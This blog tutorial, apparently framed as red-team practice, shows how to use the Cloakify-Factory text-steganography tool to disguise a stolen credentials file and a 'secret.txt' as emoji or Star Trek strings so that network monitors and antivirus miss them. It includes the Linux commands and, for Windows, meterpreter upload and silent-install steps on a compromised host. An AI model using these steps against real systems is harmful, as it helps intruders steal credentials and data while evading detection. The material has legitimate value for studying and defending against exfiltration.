Cloakify-Factory: A Data Exfiltration Tool Uses Text-Based Steganography


In our previous post, we had already discussed on “Cloud Storage Uploads for data exfiltration” and today we are going to discussed “Concealed Method for Data Exfiltration” to extract the unauthorized data. Here you will learn how an intruder can exfiltrate data through steganography approach.

Table of Content
·         Overview
·         About Data Exfiltration
·         Cloakify Installation and Usages (for Linux)
·         Method -I
·         Method II
·         Cloakify Installation and Usages (for Windows)

Overview
We will perform red team practice, where we will attempt to collect the important files from the victim's machine by inducing steganonography with the help of concealed methods. When copying information from the destination machine, we will try to transform the data to befool the network monitors so that they can not identify the data packet traveling in the network.
All this could be perfromed by using single tool named “Cloakify Factory”.
Cloakify Factory transforms any filetype (e.g .zip, .exe, .xls,etc.) into a list of harmless-looking string. This lets you hide the file in plain sight and transfer the file without triggering alerts. The fancy terms for this “text-based steganography”, hiding data by making it look like other data. Cloaked files defeat signature-based malware detection tools.

About Data Exfiltration
Data exfiltration occurs when malware and/or a malicious actor carries out an unauthorized data transfer from a computer. It is also commonly called data extrusion or data exportation. Data exfiltration is also considered a form of data theft. During the past couple of decades, a number of data exfiltration efforts severely damaged the consumer confidence, corporate valuation, and intellectual property of businesses and national security of governments across the world.


Methods of Data Exfiltration
Open Methods:
·         HTTP/HTTPS Downloads & Uploads
·         FTP
·         Email
·         Instant Messaging
·         P2P filesharing
Concealed Methods:
·         SSH
·         VPN
·         Protocol Tunneling

·         Steganography
·         Timing channel

Cloakify Installation & Usages (for Linux)
CloakifyFactory - Data Exfiltration & Infiltration In Plain Sight; Convert any filetype into list of everyday strings, using Text-Based Steganography; Evade DLP/MLS Devices, Defeat Data Whitelisting Controls, Social Engineering of Analysts, Evade AV Detection.
Only you need to type following for downloading the cloakify from github in the target machine.
git clone https://github.com/TryCatchHCF/Cloakify.git
cd Cloakify.py
chmod -R 777 noiseTools


Let’s run the python script to lunch cloakifyfactory.py
python cloakifyFactory.py
CloakifyFactory is a menu-driven tool that leverages Cloakify Toolset scripts. When you choose to Cloakify a file, the scripts first Base64-encode the payload, then apply a cipher to generate a list of strings that encodes the Base64 payload. You then transfer the file however you wish to its desired destination. Once exfiltrated, choose Decloakify with the same cipher to decode the payload.


Let's take an example now that we want to copy a text file "pwd.txt" from within the target system containing the login credentials of different machines in the network.


Method -I
It may be dangerous to copy the text file directly, so we will transform the input file data into another file as output. To do so follow below steps:
1.       Run the the python script to launch cloakifyfactory.py
2.       Press 1 to select cloakify a file option
3.       Enter the path of source file that you want to transform as input file.
4.       Enter the path of destination file to where you want to save output.
  

Further you will get a list of ciphers, choose the desire option for encrypting the file. Suppose I want the whole content to get changed into facial emojis.
1.       Press 3 for emoji cipher
2.       Allow to Add noise to cloaked file by pressing Y for yes.
3.       Then press 1 to select prependemoji.py as noise generator.

This will save the output result inside the raj.txt file.


As result you will get the output content something like shown in the below image.


Now if you want to obtain the output result in its original format, then you can go with decloakify option which will revert the transformation into its original existence, but before that you have to give all permissions to removeNoise.py
chmod 777 removeNoise.py


To do so follow below steps:
1.            Run the python script to launch cloakifyfactory.py
2.            Press 2 to select decloakify a file option
3.            Enter the path of file that you want to restore back into its original format.
4.            Enter the path of file to where you want to save output.


Press Y to answer yes because we have added noise to cloaked file and select noise generator.


Method II
Again, we have similar file that we want to cloaked into another format directly without operating cloakifyfactory console.



This time you can use single command to cloak the file by adding specify type of cipher as given below:
python cloakify.py /root/Desktop/pwd.txt ciphers/starTrek
After executing above command, we can observe the output result would be something like this as shown in the below image.


So we have used file.txt file as destination file to save the transformed information inside it without printing the output result on screen. Moreover, further we have used decloak command to revert the transformed file back into its original state.
python cloakify.py /root/Desktop/pwd.txt ciphers/starTrek > /root/Desktop/file.txt
python decloakify.py /root/Desktop/pwd.txt ciphers/starTrek


Cloakify Installation and Usages (For Windows)

As we all know this is an exfiltration tool and data could be exfiltrate from any platform either from Linux or Windows based OS, therefore cloakifyfactory has built the application both platforms. In 1st phase we have use python-based application for Linux machine and now remotely we are going to deploy cloakify factory inside Windows machine using MSI package of python for our python based application.
Thus, we downloaded the MSI package in our local machine (Kali Linux):
wget https://www.python.org/ftp/python/2.7/python-2.7.msi


Now our purpose is to show how an intruder can remotely exfiltrate the data using cloakifyfactory. So, we had compromised the system first and got the meterpreter session and then uploaded the MSI package inside the victim's machine to install the dependency required for python.
upload python-2.7.msi .
shell
msiexec /i python-2.7.msi /qn


Now download the zip file for cloakifyfactory from github in your local machine.


We also need to download 7-zip exe program for extracting the cloakify-master.zip.


Now extract the 7za920.zip  and you will get 7za.exe file that we have to inject in the victim’s machine.


Now let’s upload 7za.exe and cloakfy-master.zip in the remote system. And further use the 7za.exe program to unzip the cloakify-master.zip.
Therefore, execute following command:
upload /root/Downloads/Cloakify-master.zip .
upload /root/Downloads/7za.exe
shell
7za.exe x cloakify-master.zip


Now we want to transfer the secret.txt file of the compromise machine but directly copying the file might generate the alert therefore we will transform the data as done above.


Now again we try to covert the content of secret.txt file by hiding it behind the cloaked file. And it is very simple as performed earlier with little modification. So now we can run the cloakify.py file with the help of python.
C:\Python27\python.exe cloakify.py C:\Users\raj\Desktop\secret.txt ciphers\pokemonGo > dump.txt
type dump.txt
Thus, we can observe that with help of cloakify we have transformed the filetype cannot be detected easily.
Conclusion: cloakify-factory could be very useful for exfiltrating data internally as we saw it has many cipher script that used to cloaked data file and hence it is very effective tool for performing text-based stegnogrphy.

0 comments:

Post a Comment